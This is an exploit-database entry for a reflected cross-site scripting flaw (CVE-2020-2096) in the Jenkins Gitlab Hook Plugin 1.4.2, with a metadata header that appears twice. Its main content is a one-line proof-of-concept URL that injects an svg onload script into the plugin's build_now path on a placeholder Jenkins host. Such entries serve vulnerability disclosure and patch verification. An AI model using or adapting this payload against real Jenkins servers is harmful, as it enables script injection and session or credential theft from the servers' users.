Jenkins Gitlab Hook Plugin 1.4.2 - Reflected Cross-Site Scripting
| EKU-ID: 52041 | CVE: CVE-2020-2096 | OSVDB-ID: |
| Author: Ai Ho | Published: 2020-01-16 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 52041 | CVE: CVE-2020-2096 | OSVDB-ID: |
| Author: Ai Ho | Published: 2020-01-16 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
# Exploit Title: Jenkins Gitlab Hook Plugin 1.4.2 - Reflected Cross-Site Scripting # Exploit Author: Ai Ho # Vendor Homepage : https://jenkins.io/ # Effective version : Gitlab Hook Plugin 1.4.2 and earlier # References: https://jenkins.io/security/advisory/2020-01-15/ # CVE: CVE-2020-2096 # PoC: http://JENKINS_IP/gitlab/build_now%3Csvg/onload=alert(document.domain)%3E